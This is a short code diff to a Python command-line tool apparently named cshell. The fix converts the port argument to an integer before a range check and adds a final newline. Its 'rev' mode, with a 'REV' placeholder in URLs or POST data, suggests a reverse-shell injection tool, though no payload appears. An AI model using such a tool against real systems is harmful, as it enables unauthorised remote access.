@@ -569,7 +569,7 @@ def main():
 			if ('REV' not in url and method == 'GET') or ('REV' not in str(data) and method == "POST"):
 				aerr("\'REV\' not found on data or URL")
 				sys.exit()
-			if port not in range(0 , 65535):
+			if int(port) not in range(0 , 65535):
 				print(f"cshell rev: error: argument -p: invalid choice: {port} (choose from 1 to 65535)")
 				exit()
 
@@ -609,7 +609,7 @@ def main():
 		fmt = args.f
 		nolstn = args.nolstn
 		b64 = args.b64
-		if port not in range(0 , 65535):
+		if int(port) not in range(0 , 65535):
 			print(f"cshell rev: error: argument -p: invalid choice: {port} (choose from 1 to 65535)")
 			exit()
 
@@ -621,4 +621,4 @@ def main():
 		banner()
 		myparser.print_help()
 
-#====================================================================< Function Ends Here >=================================================================================
\ No newline at end of file
+#====================================================================< Function Ends Here >=================================================================================
